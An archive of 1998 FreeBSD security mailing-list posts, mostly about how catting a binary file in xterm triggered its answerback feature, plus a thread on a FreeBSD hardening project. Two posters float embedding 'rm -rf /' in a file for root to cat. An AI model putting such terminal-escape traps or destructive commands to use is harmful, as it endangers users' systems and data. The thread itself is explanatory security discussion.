ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA02924 for ; Thu, 10 Sep 1998 07:26:20 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id PAA01105 for ; Thu, 10 Sep 1998 15:26:08 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id PAA01854 for ; Thu, 10 Sep 1998 15:26:06 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Thu, 10 Sep 1998 15:26:06 +0100 (BST) From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-Reply-To: <35F7C4A7.12C2A1C7@kew.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org | > Was just having a look in /var/log the other day and spotted | > a file called sendmail.st, wondering what it was I cat'd it | > and here's what it did: | | Quote without comment ... Maybe I shouldn't have said that I wondered what sendmail.st was - I figured out what it did so you can all stop posting me messages telling me now :) Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 08:04:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA09316 for freebsd-security-outgoing; Thu, 10 Sep 1998 08:04:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA09291; Thu, 10 Sep 1998 08:04:34 -0700 (PDT) (envelope-from mike@seidata.com) Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with SMTP id LAA21899; Thu, 10 Sep 1998 11:06:56 -0400 (EDT) Date: Thu, 10 Sep 1998 11:06:55 -0400 (EDT) From: Mike To: Enkhyl cc: Mike Smith , security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 9 Sep 1998, Enkhyl wrote: > I'll see if I can manage to get a mailing list together to organize the > effort and divide up the work (anyone have a server I can host the list > on? :-) Sure... I don't suppose the FreeBSD Project objects in any way to having project-related lists/etc. hosted elsewhere (or maybe -security would be appropriate for this?)? If not (and if you don't get any more attractive offers), I could provide list services. > Anyone that is casually working on this, please speak up so that we can > "projectize" this. Also, this is an area of high-interest for me, so if I lurk enough on a related list, perhaps I can pick up enough info to actually be somewhat helpful. :) -mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 08:10:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA10907 for freebsd-security-outgoing; Thu, 10 Sep 1998 08:10:39 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA10898 for ; Thu, 10 Sep 1998 08:10:36 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id LAA08830; Thu, 10 Sep 1998 11:10:22 -0400 (EDT) (envelope-from wollman) Date: Thu, 10 Sep 1998 11:10:22 -0400 (EDT) From: Garrett Wollman Message-Id: <199809101510.LAA08830@khavrinen.lcs.mit.edu> To: Josef Karthauser Cc: Jay Tribick , freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-Reply-To: <19980910144324.B831@pavilion.net> References: <19980910144324.B831@pavilion.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: >> bofh$ cat sendmail.st >> `ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm >> su: xtermxterm: command not found >> bofh$ > I've noticed this also. Catting some binaries (by accident of course) > seems to interact with the terminal badly!! This is on an 'rxvt' running > bash. That's why you should normally use `more' or `less'. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 08:19:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA13606 for freebsd-security-outgoing; Thu, 10 Sep 1998 08:19:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from brooklyn.slack.net (brooklyn.slack.net [206.41.21.102]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA13565; Thu, 10 Sep 1998 08:19:41 -0700 (PDT) (envelope-from andrewr@brooklyn.slack.net) Received: from localhost (andrewr@localhost) by brooklyn.slack.net (8.8.7/8.8.7) with SMTP id LAA16903; Thu, 10 Sep 1998 11:20:10 -0400 (EDT) Date: Thu, 10 Sep 1998 11:20:10 -0400 (EDT) From: andrewr To: Enkhyl cc: security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 9 Sep 1998, Enkhyl wrote: > Back when the popper buffer overflow bug sprang forth it was suggested > that it might be a good idea to go through the OpenBSD change logs and > evaluate security-related fixes for inclusion in FreeBSD. Is there anyone > actively working on this? If there is a project organized around this, I'm > willing to help out with the endeavor. Otherwise, I'm willing to embark on > this endeavor and make a project out of it. This kind of died due to lack of interest. As I was told by jkh, if one is interested enough in this, just start up a mailing list (not from FreeBSD.org) and a team of workers and get to it. Soon, if all goes well, it would be incorporated into the actual project. Good luck. Andrew > > Comments? > > -- > Christopher Nielsen > Scient: The Art and Science of Electronic Business > cnielsen@scient.com > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 08:58:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA22544 for freebsd-security-outgoing; Thu, 10 Sep 1998 08:58:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from florence.pavilion.net (florence.pavilion.net [194.242.128.25]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA22370 for ; Thu, 10 Sep 1998 08:58:01 -0700 (PDT) (envelope-from joe@florence.pavilion.net) Received: (from joe@localhost) by florence.pavilion.net (8.8.8/8.8.8) id QAA05258; Thu, 10 Sep 1998 16:57:26 +0100 (BST) (envelope-from joe) Message-ID: <19980910165725.N831@pavilion.net> Date: Thu, 10 Sep 1998 16:57:25 +0100 From: Josef Karthauser To: Garrett Wollman Cc: Jay Tribick , freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) Mail-Followup-To: Garrett Wollman , Jay Tribick , freebsd-security@FreeBSD.ORG References: <19980910144324.B831@pavilion.net> <199809101510.LAA08830@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199809101510.LAA08830@khavrinen.lcs.mit.edu>; from Garrett Wollman on Thu, Sep 10, 1998 at 11:10:22AM -0400 X-NCC-RegID: uk.pavilion Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 10, 1998 at 11:10:22AM -0400, Garrett Wollman wrote: > < said: > > > I've noticed this also. Catting some binaries (by accident of course) > > seems to interact with the terminal badly!! This is on an 'rxvt' running > > bash. > > That's why you should normally use `more' or `less'. > Ok, but how come the interactions we describe? Joe -- Josef Karthauser Technical Manager FreeBSD: The power to serve (http://www.uk.freebsd.org) Pavilion Internet plc. [joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 09:10:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA25917 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:10:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from phluffy.lm.com (phluffy.lm.com [204.171.44.47]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA25898 for ; Thu, 10 Sep 1998 09:10:37 -0700 (PDT) (envelope-from myke@ees.com) Received: from localhost (myke@localhost) by phluffy.lm.com (8.9.0/8.8.8) with ESMTP id MAA18131; Thu, 10 Sep 1998 12:10:13 -0400 (EDT) (envelope-from myke@ees.com) Date: Thu, 10 Sep 1998 12:10:13 -0400 (EDT) From: Mike Holling X-Sender: myke@phluffy.lm.com To: Jay Tribick cc: freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Was just having a look in /var/log the other day and spotted > a file called sendmail.st, wondering what it was I cat'd it > and here's what it did: This file is used by sendmail to keep traffic statistics for each mailer. man mailstats. You should never cat arbitrary files, at least use 'less' or some other filter. - Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 09:15:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA26887 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:15:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from relay.acadiau.ca (relay.acadiau.ca [131.162.2.90]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA26882 for ; Thu, 10 Sep 1998 09:15:08 -0700 (PDT) (envelope-from 026809r@dragon.acadiau.ca) Received: from dragon.acadiau.ca (dragon [131.162.1.79]) by relay.acadiau.ca (8.8.5/8.8.5) with SMTP id NAA03411 for ; Thu, 10 Sep 1998 13:14:55 -0300 (ADT) Received: by dragon.acadiau.ca id NAA07518; Thu, 10 Sep 1998 13:14:53 -0300 From: 026809r@dragon.acadiau.ca (Michael Richards) Message-Id: <199809101614.NAA07518@dragon.acadiau.ca> Subject: cat exploit To: security@FreeBSD.ORG Date: Thu, 10 Sep 1998 13:14:53 -0300 (ADT) X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi. Is it just me or did everyone miss the point of Jay's message? What would happen if I created a file called README that was binary. Since Jay accidentally had the cat'd sendmail.st execute the command "xtermxterm" then wouldn't it be possible to create a file (like the README) the people would be tricked into catting that would run commands as them? Consider running th rm command. Hell, stick it in a temp dir and make a shell script called xtermxterm and I believe catting the file will run the script. -Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 09:22:37 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA28027 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:22:37 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA28022 for ; Thu, 10 Sep 1998 09:22:31 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id MAA09014; Thu, 10 Sep 1998 12:22:09 -0400 (EDT) (envelope-from wollman) Date: Thu, 10 Sep 1998 12:22:09 -0400 (EDT) From: Garrett Wollman Message-Id: <199809101622.MAA09014@khavrinen.lcs.mit.edu> To: Josef Karthauser Cc: Garrett Wollman , Jay Tribick , freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-Reply-To: <19980910165725.N831@pavilion.net> References: <19980910144324.B831@pavilion.net> <199809101510.LAA08830@khavrinen.lcs.mit.edu> <19980910165725.N831@pavilion.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: >> That's why you should normally use `more' or `less'. > Ok, but how come the interactions we describe? Most terminals, including the VT102 emulated by `xterm', include some mechanism for generating an ``answerback'' upon receipt of a special control code or sequence. (In xterm's case, that happens to be a control-E.) A binary file is likely enough to contain such a code. There's might be a preference you can set which will disable this feature in xterm, but I don't know what it might be (and if there is one, it's not documented). -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 09:25:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA28495 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:25:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ocean.campus.luth.se (ocean.campus.luth.se [130.240.194.116]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA28485 for ; Thu, 10 Sep 1998 09:25:00 -0700 (PDT) (envelope-from karpen@ocean.campus.luth.se) Received: (from karpen@localhost) by ocean.campus.luth.se (8.9.1/8.9.1) id SAA10499; Thu, 10 Sep 1998 18:18:41 +0200 (CEST) (envelope-from karpen) From: Mikael Karpberg Message-Id: <199809101618.SAA10499@ocean.campus.luth.se> Subject: Re: Err.. cat exploit.. (!) In-Reply-To: from Jay Tribick at "Sep 10, 98 12:07:05 pm" To: netadmin@fastnet.co.uk (Jay Tribick) Date: Thu, 10 Sep 1998 18:18:41 +0200 (CEST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Jay Tribick: > bofh$ cat sendmail.st > `ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm > su: xtermxterm: command not found > bofh$ > > This seems quite scarey to me, couldn't someone embed 'rm -rf /' > within a text file and then, if root cats the file it nukes > their system? I'm not completely clear on what that is, but I've seen it also. What I _am_ completely clear about is that it's got nothing to do with cat, and instead everything to do with xterm. I guess it's some code sequence that comes up that makes xterm do something. Kinda like the code that sets the xterm title. /Mikael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 09:36:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA29827 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:36:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA29809; Thu, 10 Sep 1998 09:36:06 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id JAA17155; Thu, 10 Sep 1998 09:35:40 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: Mike cc: Enkhyl , Mike Smith , security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening In-reply-to: Your message of "Thu, 10 Sep 1998 11:06:55 EDT." Date: Thu, 10 Sep 1998 09:35:40 -0700 Message-ID: <17151.905445340@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Sure... I don't suppose the FreeBSD Project objects in any way to > having project-related lists/etc. hosted elsewhere (or maybe > -security would be appropriate for this?)? If not (and if you don't Not at all - in fact, it's less work for us. :-) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 09:44:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA02116 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:44:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from phoenix.volant.org (phoenix.volant.org [205.179.79.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA02044 for ; Thu, 10 Sep 1998 09:44:51 -0700 (PDT) (envelope-from patl@phoenix.volant.org) From: patl@phoenix.volant.org Received: from asimov.phoenix.volant.org ([205.179.79.65]) by phoenix.volant.org with smtp (Exim 1.92 #8) id 0zH9pq-0003Ph-00; Thu, 10 Sep 1998 09:44:42 -0700 Received: from localhost by asimov.phoenix.volant.org (SMI-8.6/SMI-SVR4) id JAA25278; Thu, 10 Sep 1998 09:44:38 -0700 Date: Thu, 10 Sep 1998 09:44:38 -0700 (PDT) Reply-To: patl@phoenix.volant.org Subject: Re: Err.. cat exploit.. (!) To: Jay Tribick cc: freebsd-security@FreeBSD.ORG In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > It's not the fact that it was a binary that puzzled me but that > it had managed to execute a command on the shell just by me > cat'ing the file. Forgot to mention that it was in an xterm > and doesn't affect Virtual Consoles. It's primarily a matter of which escape and other control sequences the terminal (emulator) recognizes; although, I believe you can also get different results based on different terminal (stty) settings. A particularly fun one occurs when you have XON/XOFF enabled and the file contains a bunch of 0x13s. You can also irritate your whole office by cat'ing a file with a few thousand 0x07 (BEL) chars. (Usually, they will be buffered up so that even quickly killing the cat won't stop the noise for a while. Or at least I think that is what happened...) -Pat To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 09:58:35 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA04454 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:58:35 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA04449 for ; Thu, 10 Sep 1998 09:58:32 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id RAA10442 for ; Thu, 10 Sep 1998 17:58:18 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id RAA02522 for ; Thu, 10 Sep 1998 17:58:16 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Thu, 10 Sep 1998 17:58:16 +0100 (BST) From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: <199809101614.NAA07518@dragon.acadiau.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org (Finally!) | Is it just me or did everyone miss the point of Jay's message? :) | What would happen if I created a file called README that was binary. Since | Jay accidentally had the cat'd sendmail.st execute the command "xtermxterm" | then wouldn't it be possible to create a file (like the README) the people | would be tricked into catting that would run commands as them? | Consider running th rm command. Hell, stick it in a temp dir and make a | shell script called xtermxterm and I believe catting the file will run the | script. That's exactly what I was saying - just for example, say your installing something as root you usually cat the file INSTALL to find out what you need to do - it would be relatively simple to embed a command in there to just rm -rf / & your hd! Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 10:22:54 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA09438 for freebsd-security-outgoing; Thu, 10 Sep 1998 10:22:54 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from florence.pavilion.net (florence.pavilion.net [194.242.128.25]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA09427 for ; Thu, 10 Sep 1998 10:22:40 -0700 (PDT) (envelope-from joe@florence.pavilion.net) Received: (from joe@localhost) by florence.pavilion.net (8.8.8/8.8.8) id SAA19202; Thu, 10 Sep 1998 18:22:19 +0100 (BST) (envelope-from joe) Message-ID: <19980910182219.O831@pavilion.net> Date: Thu, 10 Sep 1998 18:22:19 +0100 From: Josef Karthauser To: Garrett Wollman Cc: Jay Tribick , freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) Mail-Followup-To: Garrett Wollman , Jay Tribick , freebsd-security@FreeBSD.ORG References: <19980910144324.B831@pavilion.net> <199809101510.LAA08830@khavrinen.lcs.mit.edu> <19980910165725.N831@pavilion.net> <199809101622.MAA09014@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199809101622.MAA09014@khavrinen.lcs.mit.edu>; from Garrett Wollman on Thu, Sep 10, 1998 at 12:22:09PM -0400 X-NCC-RegID: uk.pavilion Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 10, 1998 at 12:22:09PM -0400, Garrett Wollman wrote: > Most terminals, including the VT102 emulated by `xterm', include some > mechanism for generating an ``answerback'' upon receipt of a special > control code or sequence. (In xterm's case, that happens to be a > control-E.) A binary file is likely enough to contain such a code. > > There's might be a preference you can set which will disable this > feature in xterm, but I don't know what it might be (and if there is > one, it's not documented). Ahh that explains it. Ta, Joe -- Josef Karthauser Technical Manager FreeBSD: The power to serve (http://www.uk.freebsd.org) Pavilion Internet plc. [joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 10:44:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA13668 for freebsd-security-outgoing; Thu, 10 Sep 1998 10:44:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA13662 for ; Thu, 10 Sep 1998 10:44:22 -0700 (PDT) (envelope-from benedict@echonyc.com) Received: from localhost by echonyc.com (8.9.1/8.9.1) with SMTP id NAA21297; Thu, 10 Sep 1998 13:44:03 -0400 (EDT) Date: Thu, 10 Sep 1998 13:44:03 -0400 (EDT) From: Snob Art Genre Reply-To: ben@rosengart.com To: Jay Tribick cc: security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 10 Sep 1998, Jay Tribick wrote: > That's exactly what I was saying - just for example, say your installing > something as root you usually cat the file INSTALL to find out what > you need to do - it would be relatively simple to embed a command > in there to just rm -rf / & your hd! 1) No, you use less. 2) So you've figured out how to execute arbitrary commands from this? I'm not saying that's not possible, but so far the only thing this "bug" does is output the name of xterm. Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 10:46:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA14135 for freebsd-security-outgoing; Thu, 10 Sep 1998 10:46:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from jerusalem.jpl.nasa.gov (aig.jpl.nasa.gov [137.78.90.200]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA14122 for ; Thu, 10 Sep 1998 10:46:16 -0700 (PDT) (envelope-from mutz@pompeii.jpl.nasa.gov) Received: from pompeii.jpl.nasa.gov (pompeii [137.78.90.38]) by jerusalem.jpl.nasa.gov (8.8.8/8.8.8) with ESMTP id KAA02169 for ; Thu, 10 Sep 1998 10:46:07 -0700 (PDT) Received: from pompeii (localhost [127.0.0.1]) by pompeii.jpl.nasa.gov (8.8.8/8.8.8) with ESMTP id KAA15836 for ; Thu, 10 Sep 1998 10:46:07 -0700 (PDT) Message-Id: <199809101746.KAA15836@pompeii.jpl.nasa.gov> To: freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-reply-to: Your message of "Thu, 10 Sep 1998 11:10:22 EDT." <199809101510.LAA08830@khavrinen.lcs.mit.edu> Date: Thu, 10 Sep 1998 10:46:07 -0700 From: Darren Mutz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >< said: > >>> bofh$ cat sendmail.st >>> `ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm >>> su: xtermxterm: command not found >>> bofh$ > >> I've noticed this also. Catting some binaries (by accident of course) >> seems to interact with the terminal badly!! This is on an 'rxvt' running >> bash. > >That's why you should normally use `more' or `less'. IMHO, that's not the real fix here -- what's potentially of more interest is the fact that writing some sequence of characters to rxvt can confuse it to the extent that it will execute another string you write to it. This problem seems to imply that anyone with write access to your terminal can execute commands as you. -- Darren Mutz darren.mutz@jpl.nasa.gov My opinions, not JPL's. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 10:48:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA14685 for freebsd-security-outgoing; Thu, 10 Sep 1998 10:48:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA14670 for ; Thu, 10 Sep 1998 10:48:31 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id KAA17578; Thu, 10 Sep 1998 10:45:50 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: 026809r@dragon.acadiau.ca (Michael Richards) cc: security@FreeBSD.ORG Subject: Re: cat exploit In-reply-to: Your message of "Thu, 10 Sep 1998 13:14:53 -0300." <199809101614.NAA07518@dragon.acadiau.ca> Date: Thu, 10 Sep 1998 10:45:50 -0700 Message-ID: <17574.905449550@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Is it just me or did everyone miss the point of Jay's message? The problem is that Jay's message didn't actually have a point. :) Rather, it described a symtom common to most VT100 compliant terminal emulators and something very clearly under the "well don't DO that then" category. It's nothing new at all and if you're not sure of the contents of a file, don't just blindly cat it to your screen. The same goes for any binary I might hand you - if I put up a file on an FTP site called ``megaspacewar.exe'' and you go and run it on your Windows box and it trojans you to death (or worse), who's fault is that? :-) Same basic issue. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 10:53:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA15852 for freebsd-security-outgoing; Thu, 10 Sep 1998 10:53:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA15843 for ; Thu, 10 Sep 1998 10:53:38 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.1/8.8.5) with ESMTP id TAA04714; Thu, 10 Sep 1998 19:46:11 +0200 (CEST) To: 026809r@dragon.acadiau.ca (Michael 